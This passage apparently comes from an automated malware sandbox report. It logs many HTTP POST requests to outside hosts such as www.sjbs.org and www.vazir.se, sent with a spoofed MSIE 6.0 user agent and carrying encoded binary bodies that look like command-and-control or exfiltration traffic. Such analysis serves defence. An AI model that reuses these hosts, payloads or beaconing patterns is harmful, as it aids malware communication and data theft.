4e 45 64 71 58 66 31 43 32 4d 6b 42 5a 47 6f 55 55 75 2f 50 58 77 55 72 44 4b 42 76 34 33 33 58 53 47 67 6c 62 47 6c 56 34 2b 70 4e 69 47 4d 77 67 50 32 4a 56 38 44 68 43 55 67 77 6f 31 39 68 49 63 2b 56 6f 42 74 2b 55 73 77 41 58 54 6d 37 49 62 4c 4e 2b 48 63 68 54 47 46 79 73 6b 4e 61 56 35 43 5a Data Ascii: 82fb1EZBJw79sqSuYSdF+Glq/0um2CgO2tExaw34G6A85IGqSoKzs80Fu2ASItplKvAbDzh8JEofA+ES01DrNl7VGkk8b1bOiUu6TIvmje/sAfPjU1UPlaeznIq8fbvVFDfbIDN+h2D/PPusiCbbkBIzx8IsVTQVPxS/no9OrPOsMgjgqq/3AvVpWfSiwCHl3yg65bIyr97zDwqfElXbb31A5h8n4LRjfiPEUQBNbTXv3cJ1IW8vtm2cRuxRJ+MVOtkP4rrj1MnqCnaaFD5k+OK/ZqnVrbG0hai+f8VoMu3r1ch/R+xx82yu8QUHQqvtdvEXlXeOdIHCQF9J9YeN5Dms1+6fkBbupU/9uCZfhoova3sABpNBMsgB+9U1VE3YYFx+lnuavuBKYevDcATMVcNRXIQziKCp4KWJ0rzQyoLY10wgVRFoCSEJNEdqXf1C2MkBZGoUUu/PXwUrDKBv433XSGglbGlV4+pNiGMwgP2JV8DhCUgwo19hIc+VoBt+UswAXTm7IbLN+HchTGFyskNaV5CZ
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.credo.edu.plCache-Control: no-cacheData Raw: 38 32 66 62 31 45 5a 42 4a 77 37 39 73 71 53 75 59 53 64 46 2b 47 6c 71 2f 30 75 6d 32 43 67 4f 32 74 45 78 61 77 33 34 47 36 41 38 35 49 47 71 53 6f 4b 7a 73 38 30 46 75 32 41 53 49 74 70 6c 4b 76 41 62 44 7a 68 38 4a 45 6f 66 41 2b 45 53 30 31 44 72 4e 6c 37 56 47 6b 6b 38 62 31 62 4f 69 55 75 36 54 49 76 6d 6a 65 2f 73 41 66 50 6a 55 31 55 50 6c 61 65 7a 6e 49 71 38 66 62 76 56 46 44 66 62 49 44 4e 2b 68 32 44 2f 50 50 75 73 69 43 62 62 6b 42 49 7a 78 38 49 73 56 54 51 56 50 78 53 2f 6e 6f 39 4f 72 50 4f 73 4d 67 6a 67 71 71 2f 33 41 76 56 70 57 66 53 69 77 43 48 6c 33 79 67 36 35 62 49 79 72 39 37 7a 44 77 71 66 45 6c 58 62 62 33 31 41 35 68 38 6e 34 4c 52 6a 66 69 50 45 55 51 42 4e 62 54 58 76 33 63 4a 31 49 57 38 76 74 6d 32 63 52 75 78 52 4a 2b 4d 56 4f 74 6b 50 34 72 72 6a 31 4d 6e 71 43 6e 61 61 46 44 35 6b 2b 4f 4b 2f 5a 71 6e 56 72 62 47 30 68 61 69 2b 66 38 56 6f 4d 75 33 72 31 63 68 2f 52 2b 78 78 38 32 79 75 38 51 55 48 51 71 76 74 64 76 45 58 6c 58 65 4f 64 49 48 43 51 46 39 4a 39 59 65 4e 35 44 6d 73 31 2b 36 66 6b 42 62 75 70 55 2f 39 75 43 5a 66 68 6f 6f 76 61 33 73 41 42 70 4e 42 4d 73 67 42 2b 39 55 31 56 45 33 59 59 46 78 2b 6c 6e 75 61 76 75 42 4b 59 65 76 44 63 41 54 4d 56 63 4e 52 58 49 51 7a 69 4b 43 70 34 4b 57 4a 30 72 7a 51 79 6f 4c 59 31 30 77 67 56 52 46 6f 43 53 45 4a 4e 45 64 71 58 66 31 43 32 4d 6b 42 5a 47 6f 55 55 75 2f 50 58 77 55 72 44 4b 42 76 34 33 33 58 53 47 67 6c 62 47 6c 56 34 2b 70 4e 69 47 4d 77 67 50 32 4a 56 38 44 68 43 55 67 77 6f 31 39 68 49 63 2b 56 6f 42 74 2b 55 73 77 41 58 54 6d 37 49 62 4c 4e 2b 48 63 68 54 47 46 79 73 6b 4e 61 56 35 43 5a Data Ascii: 82fb1EZBJw79sqSuYSdF+Glq/0um2CgO2tExaw34G6A85IGqSoKzs80Fu2ASItplKvAbDzh8JEofA+ES01DrNl7VGkk8b1bOiUu6TIvmje/sAfPjU1UPlaeznIq8fbvVFDfbIDN+h2D/PPusiCbbkBIzx8IsVTQVPxS/no9OrPOsMgjgqq/3AvVpWfSiwCHl3yg65bIyr97zDwqfElXbb31A5h8n4LRjfiPEUQBNbTXv3cJ1IW8vtm2cRuxRJ+MVOtkP4rrj1MnqCnaaFD5k+OK/ZqnVrbG0hai+f8VoMu3r1ch/R+xx82yu8QUHQqvtdvEXlXeOdIHCQF9J9YeN5Dms1+6fkBbupU/9uCZfhoova3sABpNBMsgB+9U1VE3YYFx+lnuavuBKYevDcATMVcNRXIQziKCp4KWJ0rzQyoLY10wgVRFoCSEJNEdqXf1C2MkBZGoUUu/PXwUrDKBv433XSGglbGlV4+pNiGMwgP2JV8DhCUgwo19hIc+VoBt+UswAXTm7IbLN+HchTGFyskNaV5CZ
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pdqhomes.comCache-Control: no-cacheData Raw: 4e 51 38 71 44 4e 70 37 2f 77 32 52 66 4d 4a 2b 2f 52 6b 4c 31 68 31 47 4b 77 50 4b 2b 49 42 4a 72 6f 74 36 56 57 34 47 76 35 48 37 43 54 38 47 65 53 50 54 4f 5a 45 4f 31 30 50 6e 78 63 37 68 79 53 49 72 77 55 67 42 4e 41 42 78 38 2b 62 4a 53 31 43 36 31 49 6a 63 39 59 4c 54 61 4d 2f 48 35 56 58 66 32 33 70 7a 56 6b 32 46 7a 2b 61 64 50 35 6f 68 70 6e 30 4a 75 76 45 5a 36 39 59 77 6a 47 33 33 39 35 54 56 39 63 32 35 6b 78 33 49 6d 32 50 7a 70 6c 37 33 42 73 2f 79 63 49 51 35 47 32 76 35 6a 76 57 65 68 66 50 6d 48 51 6a 4f 52 69 6d 41 73 38 6f 2b 78 38 50 6c 4e 6c 69 67 5a 47 4b 39 74 36 6a 36 47 4e 31 52 48 50 62 75 42 50 7a 65 38 49 62 52 33 36 47 2b 32 44 41 44 51 4b 4b 48 46 58 78 69 68 72 30 31 52 51 78 49 46 61 42 49 42 72 4a 4d 46 34 4c 77 71 2f 62 39 77 6e 39 4f 45 4a 78 39 6a 52 59 78 58 6c 71 61 7a 70 7a 67 48 5a 6b 41 51 73 45 4c 6c 77 74 57 41 35 61 67 43 72 31 49 53 38 32 68 66 47 4a 6f 4e 4e 33 68 4a 54 39 52 37 71 6d 70 37 32 55 67 79 47 62 37 4d 41 78 76 34 72 68 42 49 45 68 4d 58 61 61 53 4e 64 55 4f 78 46 48 6d 78 34 67 33 6e 6b 58 5a 65 59 61 4a 70 31 53 53 36 66 41 48 65 69 34 7a 73 66 47 41 57 5a 78 30 44 7a 59 4a 78 69 75 6f 6f 4d 56 48 4c 32 78 6d 5a 45 39 45 6b 31 53 46 73 35 53 4b 59 64 62 6d 7a 37 61 4e 2f 73 59 62 5a 46 42 77 51 4b 75 52 74 77 70 34 32 46 72 4a 72 4c 4e 30 2b 2f 4e 70 79 2f 36 72 55 56 67 57 69 7a 74 30 74 71 77 44 52 73 4c 33 50 53 61 46 4d 67 36 36 68 36 5a 6b 42 49 68 42 64 67 43 30 37 6b 75 38 41 54 6f 67 6e 30 4c 45 30 71 49 57 52 52 77 30 43 61 69 4f 73 32 72 31 30 48 73 64 61 72 36 31 2f 69 30 69 71 70 30 78 6e 2b 77 32 51 52 4c 61 44 4b 63 62 35 42 41 55 62 4d 48 31 48 43 41 6d Data Ascii: NQ8qDNp7/w2RfMJ+/RkL1h1GKwPK+IBJrot6VW4Gv5H7CT8GeSPTOZEO10Pnxc7hySIrwUgBNABx8+bJS1C61Ijc9YLTaM/H5VXf23pzVk2Fz+adP5ohpn0JuvEZ69YwjG3395TV9c25kx3Im2Pzpl73Bs/ycIQ5G2v5jvWehfPmHQjORimAs8o+x8PlNligZGK9t6j6GN1RHPbuBPze8IbR36G+2DADQKKHFXxihr01RQxIFaBIBrJMF4Lwq/b9wn9OEJx9jRYxXlqazpzgHZkAQsELlwtWA5agCr1IS82hfGJoNN3hJT9R7qmp72UgyGb7MAxv4rhBIEhMXaaSNdUOxFHmx4g3nkXZeYaJp1SS6fAHei4zsfGAWZx0DzYJxiuooMVHL2xmZE9Ek1SFs5SKYdbmz7aN/sYbZFBwQKuRtwp42FrJrLN0+/Npy/6rUVgWizt0tqwDRsL3PSaFMg66h6ZkBIhBdgC07ku8ATogn0LE0qIWRRw0CaiOs2r10Hsdar61/i0iqp0xn+w2QRLaDKcb5BAUbMH1HCAm
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.sjbs.orgCache-Control: no-cacheData Raw: 33 75 54 59 41 36 68 33 49 41 36 68 68 30 72 6f 61 2f 59 70 6b 78 75 46 66 34 71 77 51 30 64 47 58 42 57 39 62 55 47 46 65 45 77 62 59 48 67 36 49 52 46 48 34 42 5a 57 62 47 39 4a 30 4f 4b 79 39 38 42 73 33 50 72 31 62 56 6b 53 4a 46 51 56 61 42 2b 36 6e 38 31 4f 75 67 5a 73 50 50 59 67 53 68 55 71 34 42 4a 68 46 76 6f 4e 46 54 42 58 30 59 6c 77 51 52 6f 41 6e 2b 37 72 64 38 65 4c 50 37 49 31 72 76 74 34 6e 31 53 76 47 55 56 58 4d 42 48 70 7a 44 70 4e 65 35 62 46 7a 59 5a 6e 52 42 51 57 44 4e 32 45 52 34 6b 68 4d 58 32 54 2b 4c 6f 63 6b 62 76 31 62 32 63 55 39 30 71 4a 50 39 41 6f 43 6b 2b 6b 4a 79 76 6c 47 6f 34 4b 59 70 39 5a 63 79 38 7a 71 46 45 6b 75 73 30 6e 73 79 74 35 77 52 42 49 39 67 6a 53 2b 47 51 6b 6b 56 62 4a 70 6f 68 70 79 73 5a 34 4b 78 59 51 79 64 44 4d 39 72 71 39 72 61 52 67 74 45 6d 66 6b 74 4f 43 30 69 36 71 6b 52 63 75 6a 44 65 44 77 6f 78 57 49 79 4c 75 2b 44 55 35 39 51 50 48 63 37 70 4a 54 33 65 56 6f 76 49 6b 6b 62 52 77 70 2b 79 5a 39 79 31 38 52 63 71 34 4f 56 50 56 41 4a 37 65 70 39 46 59 61 37 54 30 31 64 78 50 65 4a 4a 63 50 69 78 70 4b 74 6a 7a 4a 6f 73 55 35 7a 4b 66 70 6b 41 6d 51 4b 32 50 71 63 44 6d 39 55 65 2f 5a 4d 63 32 71 72 64 31 62 5a 74 2f 6d 62 65 78 34 74 38 49 55 4e 43 79 58 2b 77 57 6c 78 61 2f 6b 2f 54 5a 6e 74 74 6d 65 59 35 62 61 66 47 45 4c 52 4d 32 4c 56 48 45 71 6e 41 69 4b 45 56 70 53 63 4b 54 45 34 38 75 77 6d 4f 4f 51 31 50 48 37 78 77 46 6c 77 4f 61 65 37 44 63 52 4a 39 78 43 54 50 58 70 45 66 2b 76 34 70 4c 70 30 62 66 65 78 77 2f 73 4d 77 38 77 44 44 71 68 46 41 77 4f 7a 69 72 73 57 38 30 49 7a 67 32 4a 6c 52 39 62 61 42 79 2b 67 34 47 61 74 31 36 63 79 39 55 2b 6a 59 62 78 4a 6c 63 79 65 2b 6c 77 65 2f 62 49 33 45 45 4f 49 54 35 43 33 49 3d Data Ascii: 3uTYA6h3IA6hh0roa/YpkxuFf4qwQ0dGXBW9bUGFeEwbYHg6IRFH4BZWbG9J0OKy98Bs3Pr1bVkSJFQVaB+6n81OugZsPPYgShUq4BJhFvoNFTBX0YlwQRoAn+7rd8eLP7I1rvt4n1SvGUVXMBHpzDpNe5bFzYZnRBQWDN2ER4khMX2T+Lockbv1b2cU90qJP9AoCk+kJyvlGo4KYp9Zcy8zqFEkus0nsyt5wRBI9gjS+GQkkVbJpohpysZ4KxYQydDM9rq9raRgtEmfktOC0i6qkRcujDeDwoxWIyLu+DU59QPHc7pJT3eVovIkkbRwp+yZ9y18Rcq4OVPVAJ7ep9FYa7T01dxPeJJcPixpKtjzJosU5zKfpkAmQK2PqcDm9Ue/ZMc2qrd1bZt/mbex4t8IUNCyX+wWlxa/k/TZnttmeY5bafGELRM2LVHEqnAiKEVpScKTE48uwmOOQ1PH7xwFlwOae7DcRJ9xCTPXpEf+v4pLp0bfexw/sMw8wDDqhFAwOzirsW80Izg2JlR9baBy+g4Gat16cy9U+jYbxJlcye+lwe/bI3EEOIT5C3I=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.vazir.seCache-Control: no-cacheCookie: btst=e20fe2c1455c3e9c8427fe86f0881e8c|84.17.52.43|1690487009|1690486975|17|2|0; snkz=84.17.52.43Data Raw: 75 52 77 49 7a 39 6f 51 4a 77 34 33 68 4a 41 46 2f 61 70 72 4b 68 32 6a 32 4f 37 4b 49 56 78 70 72 6a 42 59 6b 4f 6d 66 6c 76 75 59 45 50 53 43 6e 52 36 77 33 35 39 6a 6a 36 47 49 46 52 30 61 39 42 74 30 6b 6b 76 78 47 39 78 62 67 62 41 63 77 35 5a 4f 61 35 50 53 69 4f 68 61 37 72 79 62 6b 77 2b 62 71 64 73 75 2f 69 52 48 75 48 61 34 48 35 69 30 48 41 41 72 30 71 7a 45 5a 65 4c 50 33 4f 74 6a 4f 41 79 70 48 68 77 4e 77 52 33 79 70 71 6a 61 6b 54 4f 45 68 33 64 6e 58 4f 6b 44 42 78 63 68 77 4d 79 46 6b 50 74 43 2f 74 65 61 66 74 78 4d 33 7a 4f 68 34 4a 77 6e 72 51 39 51 46 65 63 65 56 77 68 5a 47 69 76 5a 56 46 49 32 50 4b 65 35 52 2b 56 45 68 38 77 71 65 52 65 6e 61 6a 66 75 73 32 4e 4e 49 77 37 77 41 77 41 41 36 4b 4b 76 45 57 61 4a 48 37 35 6b 75 58 49 38 5a 69 32 70 47 53 50 6c 39 47 4a 74 2b 70 55 75 45 4e 31 59 31 67 5a 42 79 5a 44 49 4a 47 79 52 70 5a 33 49 55 56 7a 73 47 41 37 33 67 41 57 63 78 67 38 66 50 37 68 76 38 38 2f 2b 53 37 6d 4f 2f 56 2f 73 54 77 58 78 49 51 4a 37 59 51 33 6e 36 70 38 36 6d 77 43 4e 4d 56 48 77 53 73 33 67 69 77 39 4b 34 79 33 6b 68 77 68 47 41 78 63 65 6e 49 78 6b 5a 51 66 42 34 4e 6a 76 4c 4f 64 52 5a 35 31 59 4e 64 74 7a 37 79 63 43 56 54 4f 2f 76 6d 79 53 68 6c 43 48 2f 49 79 36 43 43 7a 58 47 6a 49 45 70 78 6b 39 38 45 50 70 64 73 73 59 48 38 33 58 53 50 52 4b 72 49 79 6b 73 4e 50 52 43 54 47 50 51 6d 6d 6b 51 6c 47 63 69 44 31 46 2b 55 6a 59 2b 52 58 32 50 47 76 39 50 78 37 73 76 53 30 75 34 71 76 4c 63 38 79 68 75 46 33 50 50 2f 4a 4d 54 52 41 31 72 36 4e 52 6e 46 75 48 32 4a 77 4b 6d 2f 4c 75 61 76 61 37 79 74 48 54 4d 6d 62 71 65 43 54 47 2b 68 76 6a 46 31 69 33 64 77 3d 3d Data Ascii: uRwIz9oQJw43hJAF/aprKh2j2O7KIVxprjBYkOmflvuYEPSCnR6w359jj6GIFR0a9Bt0kkvxG9xbgbAcw5ZOa5PSiOha7rybkw+bqdsu/iRHuHa4H5i0HAAr0qzEZeLP3OtjOAypHhwNwR3ypqjakTOEh3dnXOkDBxchwMyFkPtC/teaftxM3zOh4JwnrQ9QFeceVwhZGivZVFI2PKe5R+VEh8wqeRenajfus2NNIw7wAwAA6KKvEWaJH75kuXI8Zi2pGSPl9GJt+pUuEN1Y1gZByZDIJGyRpZ3IUVzsGA73gAWcxg8fP7hv88/+S7mO/V/sTwXxIQJ7YQ3n6p86mwCNMVHwSs3giw9K4y3khwhGAxcenIxkZQfB4NjvLOdRZ51YNdtz7ycCVTO/vmyShlCH/Iy6CCzXGjIEpxk98EPpdssYH83XSPRKrIyksNPRCTGPQmmkQlGciD1F+UjY+RX2PGv9Px7svS0u4qvLc8yhuF3PP/JMTRA1r6NRnFuH2JwKm/Luava7ytHTMmbqeCTG+hvjF1i3dw==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pwd.orgCache-Control: no-cacheData Raw: 76 77 58 56 53 4b 56 56 4d 77 35 48 4c 46 38 76 54 41 70 48 78 68 37 39 45 71 6e 7a 4b 52 4e 4f 71 52 78 52 55 49 70 6f 33 71 33 39 4c 74 43 53 74 72 45 34 4d 33 50 37 53 6d 55 67 77 64 48 33 51 42 2b 64 44 6b 65 75 76 38 58 48 43 56 71 39 41 58 4e 66 41 76 55 4a 36 4e 4e 77 47 2b 6c 74 47 6f 67 51 67 44 46 53 6f 6f 50 44 59 55 65 4f 4d 46 31 42 4a 6b 4d 71 6a 31 6d 4b 4a 52 75 4e 56 58 64 77 39 66 6c 33 35 43 76 4e 4c 6c 64 35 49 2f 6c 6f 43 4d 4d 4d 6b 79 45 37 77 39 4e 39 55 78 4a 59 54 38 65 34 66 39 38 73 43 5a 6a 42 61 5a 2b 62 49 77 36 76 74 35 50 69 72 54 33 44 2b 4b 73 7a 73 50 4b 61 34 38 67 39 43 37 6c 7a 7a 6f 46 6b 37 44 61 5a 48 6b 55 50 6a 6d 66 2b 51 53 68 46 4a 68 71 66 4d 50 4c 77 33 4b 4f 34 66 7a 6b 41 6f 55 44 61 66 36 32 4f 6c 32 4d 53 36 55 4a 6c 4d 76 56 68 4d 66 52 69 42 74 78 52 6a 34 75 33 76 57 36 7a 78 55 47 33 79 54 59 49 73 78 52 35 72 6e 36 32 42 6c 37 6e 46 6f 6c 54 6c 50 76 65 45 48 75 42 75 56 43 69 33 79 38 43 43 61 63 4b 6a 5a 49 4b 35 35 2b 46 56 35 4d 33 57 77 64 4d 37 6f 4f 6c 48 49 6a 45 78 62 68 36 2f 49 69 64 75 44 67 52 49 38 68 47 65 4c 71 6c 6f 4e 45 64 58 34 30 30 33 78 6b 74 71 66 65 68 37 5a 53 32 59 57 66 69 73 5a 34 70 37 72 72 62 46 6b 58 73 32 7a 4f 68 66 35 52 73 78 48 50 38 41 5a 68 55 6e 62 37 6f 44 35 59 6b 6a 42 36 5a 38 61 2f 64 68 71 31 57 67 4c 62 6d 46 4f 79 38 6d 31 70 42 4e 4c 66 64 31 77 2f 78 32 37 52 67 36 34 2b 53 51 58 6d 42 55 55 65 6a 37 35 38 52 49 53 75 45 66 64 74 7a 66 75 79 48 66 6b 38 32 5a 70 45 34 6c 55 55 6e 79 53 73 73 54 4b 58 31 31 69 59 66 54 6e 36 65 51 70 34 74 76 62 72 42 6f 70 63 36 75 4a 52 50 78 4b 4e 74 36 37 74 2b 4a 36 6a 2f 5a 59 67 32 2b 69 4c 48 7a 6d 38 68 4f 31 66 6c 78 33 58 57 36 4e 62 33 54 36 74 67 36 70 36 71 7a 67 3d 3d Data Ascii: vwXVSKVVMw5HLF8vTApHxh79EqnzKRNOqRxRUIpo3q39LtCStrE4M3P7SmUgwdH3QB+dDkeuv8XHCVq9AXNfAvUJ6NNwG+ltGogQgDFSooPDYUeOMF1BJkMqj1mKJRuNVXdw9fl35CvNLld5I/loCMMMkyE7w9N9UxJYT8e4f98sCZjBaZ+bIw6vt5PirT3D+KszsPKa48g9C7lzzoFk7DaZHkUPjmf+QShFJhqfMPLw3KO4fzkAoUDaf62Ol2MS6UJlMvVhMfRiBtxRj4u3vW6zxUG3yTYIsxR5rn62Bl7nFolTlPveEHuBuVCi3y8CCacKjZIK55+FV5M3WwdM7oOlHIjExbh6/IiduDgRI8hGeLqloNEdX4003xktqfeh7ZS2YWfisZ4p7rrbFkXs2zOhf5RsxHP8AZhUnb7oD5YkjB6Z8a/dhq1WgLbmFOy8m1pBNLfd1w/x27Rg64+SQXmBUUej758RISuEfdtzfuyHfk82ZpE4lUUnySssTKX11iYfTn6eQp4tvbrBopc6uJRPxKNt67t+J6j/ZYg2+iLHzm8hO1flx3XW6Nb3T6tg6p6qzg==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.sjbs.orgCache-Control: no-cacheData Raw: 33 75 54 59 41 36 68 33 49 41 36 68 68 30 72 6f 61 2f 59 70 6b 78 75 46 66 34 71 77 51 30 64 47 58 42 57 39 62 55 47 46 65 45 77 62 59 48 67 36 49 52 46 48 34 42 5a 57 62 47 39 4a 30 4f 4b 79 39 38 42 73 33 50 72 31 62 56 6b 53 4a 46 51 56 61 42 2b 36 6e 38 31 4f 75 67 5a 73 50 50 59 67 53 68 55 71 34 42 4a 68 46 76 6f 4e 46 54 42 58 30 59 6c 77 51 52 6f 41 6e 2b 37 72 64 38 65 4c 50 37 49 31 72 76 74 34 6e 31 53 76 47 55 56 58 4d 42 48 70 7a 44 70 4e 65 35 62 46 7a 59 5a 6e 52 42 51 57 44 4e 32 45 52 34 6b 68 4d 58 32 54 2b 4c 6f 63 6b 62 76 31 62 32 63 55 39 30 71 4a 50 39 41 6f 43 6b 2b 6b 4a 79 76 6c 47 6f 34 4b 59 70 39 5a 63 79 38 7a 71 46 45 6b 75 73 30 6e 73 79 74 35 77 52 42 49 39 67 6a 53 2b 47 51 6b 6b 56 62 4a 70 6f 68 70 79 73 5a 34 4b 78 59 51 79 64 44 4d 39 72 71 39 72 61 52 67 74 45 6d 66 6b 74 4f 43 30 69 36 71 6b 52 63 75 6a 44 65 44 77 6f 78 57 49 79 4c 75 2b 44 55 35 39 51 50 48 63 37 70 4a 54 33 65 56 6f 76 49 6b 6b 62 52 77 70 2b 79 5a 39 79 31 38 52 63 71 34 4f 56 50 56 41 4a 37 65 70 39 46 59 61 37 54 30 31 64 78 50 65 4a 4a 63 50 69 78 70 4b 74 6a 7a 4a 6f 73 55 35 7a 4b 66 70 6b 41 6d 51 4b 32 50 71 63 44 6d 39 55 65 2f 5a 4d 63 32 71 72 64 31 62 5a 74 2f 6d 62 65 78 34 74 38 49 55 4e 43 79 58 2b 77 57 6c 78 61 2f 6b 2f 54 5a 6e 74 74 6d 65 59 35 62 61 66 47 45 4c 52 4d 32 4c 56 48 45 71 6e 41 69 4b 45 56 70 53 63 4b 54 45 34 38 75 77 6d 4f 4f 51 31 50 48 37 78 77 46 6c 77 4f 61 65 37 44 63 52 4a 39 78 43 54 50 58 70 45 66 2b 76 34 70 4c 70 30 62 66 65 78 77 2f 73 4d 77 38 77 44 44 71 68 46 41 77 4f 7a 69 72 73 57 38 30 49 7a 67 32 4a 6c 52 39 62 61 42 79 2b 67 34 47 61 74 31 36 63 79 39 55 2b 6a 59 62 78 4a 6c 63 79 65 2b 6c 77 65 2f 62 49 33 45 45 4f 49 54 35 43 33 49 3d Data Ascii: 3uTYA6h3IA6hh0roa/YpkxuFf4qwQ0dGXBW9bUGFeEwbYHg6IRFH4BZWbG9J0OKy98Bs3Pr1bVkSJFQVaB+6n81OugZsPPYgShUq4BJhFvoNFTBX0YlwQRoAn+7rd8eLP7I1rvt4n1SvGUVXMBHpzDpNe5bFzYZnRBQWDN2ER4khMX2T+Lockbv1b2cU90qJP9AoCk+kJyvlGo4KYp9Zcy8zqFEkus0nsyt5wRBI9gjS+GQkkVbJpohpysZ4KxYQydDM9rq9raRgtEmfktOC0i6qkRcujDeDwoxWIyLu+DU59QPHc7pJT3eVovIkkbRwp+yZ9y18Rcq4OVPVAJ7ep9FYa7T01dxPeJJcPixpKtjzJosU5zKfpkAmQK2PqcDm9Ue/ZMc2qrd1bZt/mbex4t8IUNCyX+wWlxa/k/TZnttmeY5bafGELRM2LVHEqnAiKEVpScKTE48uwmOOQ1PH7xwFlwOae7DcRJ9xCTPXpEf+v4pLp0bfexw/sMw8wDDqhFAwOzirsW80Izg2JlR9baBy+g4Gat16cy9U+jYbxJlcye+lwe/bI3EEOIT5C3I=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nqks.comCache-Control: no-cacheData Raw: 76 2f 4b 46 54 61 56 38 4d 77 37 6c 39 66 4d 75 54 41 58 54 70 42 36 38 4d 44 2f 7a 6e 4b 39 75 71 57 75 59 34 74 2b 49 51 64 2f 6b 34 41 63 66 2f 35 75 74 6a 71 6c 45 41 68 5a 63 38 37 61 2b 66 75 48 63 6a 33 35 7a 43 64 38 58 70 64 71 2b 77 6a 47 6f 51 38 34 6d 74 54 68 32 32 69 4e 62 67 59 31 65 61 46 44 74 69 36 6a 4b 46 4b 6c 6a 72 38 32 43 70 42 33 46 68 57 6e 69 30 49 2f 75 63 71 66 64 46 66 65 57 2b 6d 45 6c 53 56 44 44 44 41 36 6e 6c 2f 6d 42 57 30 6d 46 4c 49 2b 6a 31 61 4f 56 2b 44 56 6b 37 64 43 4b 71 38 67 72 30 52 6c 51 6b 53 4f 54 2b 5a 35 77 5a 79 6c 61 6c 71 51 64 4d 4f 4a 70 69 42 67 50 79 4d 48 77 61 6c 54 62 46 55 39 2f 36 6a 65 45 56 2f 4f 6f 79 66 4e 75 52 69 7a 6e 71 39 57 35 65 4f 35 34 73 4c 68 2f 4e 7a 58 4b 50 6a 49 70 2f 56 4b 4f 4e 77 77 4d 30 39 78 6a 46 46 74 4e 4a 54 2f 39 2b 49 4a 50 4e 51 78 4d 4f 38 4c 61 45 68 66 32 6b 39 79 74 59 67 6a 33 30 4a 7a 64 44 42 79 4f 4f 6a 47 33 4d 53 49 77 77 30 74 4c 55 72 6f 67 52 46 30 65 63 30 4f 71 70 71 32 4b 7a 69 42 57 6a 2f 71 77 69 6b 4b 2f 53 4a 2b 36 6e 45 59 34 35 4f 46 4f 73 39 63 61 58 6d 39 71 71 77 67 6d 69 49 6e 63 52 4c 6f 33 58 6d 4c 52 42 72 65 4c 30 52 4a 55 42 6b 4e 32 66 34 41 34 6c 73 31 63 33 6a 47 4a 56 6a 75 77 6a 47 4c 62 2f 43 4a 58 2b 6a 4d 67 66 63 4e 30 79 6e 6c 73 32 55 58 76 31 74 47 30 58 37 2b 46 74 4b 70 4e 4d 44 71 45 2f 31 36 61 59 75 64 33 67 55 61 4b 37 53 4e 57 44 56 64 45 64 68 32 73 71 59 58 6e 30 6d 61 68 57 69 58 65 36 67 6b 57 70 33 6d 52 70 39 54 58 74 36 4e 49 61 5a 45 4c 47 56 76 4b 51 74 68 4d 34 35 52 4b 64 70 61 31 66 4a 45 45 31 36 57 4a 61 57 71 4b 70 63 34 56 56 4e 5a 57 34 6a 46 74 33 58 79 43 57 6e 68 66 46 34 6b 73 38 67 4a 53 6d 32 72 6b 64 47 56 4c 6d 44 51 6f 44 51 3d 3d Data Ascii: v/KFTaV8Mw7l9fMuTAXTpB68MD/znK9uqWuY4t+IQd/k4Acf/5utjqlEAhZc87a+fuHcj35zCd8Xpdq+wjGoQ84mtTh22iNbgY1eaFDti6jKFKljr82CpB3FhWni0I/ucqfdFfeW+mElSVDDDA6nl/mBW0mFLI+j1aOV+DVk7dCKq8gr0RlQkSOT+Z5wZylalqQdMOJpiBgPyMHwalTbFU9/6jeEV/OoyfNuRiznq9W5eO54sLh/NzXKPjIp/VKONwwM09xjFFtNJT/9+IJPNQxMO8LaEhf2k9ytYgj30JzdDByOOjG3MSIww0tLUrogRF0ec0Oqpq2KziBWj/qwikK/SJ+6nEY45OFOs9caXm9qqwgmiIncRLo3XmLRBreL0RJUBkN2f4A4ls1c3jGJVjuwjGLb/CJX+jMgfcN0ynls2UXv1tG0X7+FtKpNMDqE/16aYud3gUaK7SNWDVdEdh2sqYXn0mahWiXe6gkWp3mRp9TXt6NIaZELGVvKQthM45RKdpa1fJEE16WJaWqKpc4VVNZW4jFt3XyCWnhfF4ks8gJSm2rkdGVLmDQoDQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.otena.comCache-Control: no-cacheData Raw: 4e 41 5a 34 79 6d 57 4c 4e 77 36 53 6a 32 59 7a 44 45 57 6f 73 39 35 34 4b 7a 47 7a 59 6d 41 4f 61 63 37 30 52 74 41 5a 56 2f 4c 54 50 78 51 78 5a 7a 4c 53 42 57 77 55 43 61 5a 56 72 6e 43 45 79 39 2f 67 57 45 55 76 55 67 54 31 64 4e 58 39 66 56 63 73 76 5a 73 7a 75 6c 67 2b 36 78 31 6e 4a 42 66 30 75 43 31 6d 47 52 6f 70 7a 4e 6c 49 70 4e 36 6a 70 64 46 48 66 2f 42 37 6a 59 42 66 6f 49 36 6c 37 33 48 51 74 74 64 65 62 69 59 44 42 6e 36 4a 49 47 4c 70 6e 32 4e 34 6e 6a 4c 4e 33 43 61 30 4c 6e 79 4f 31 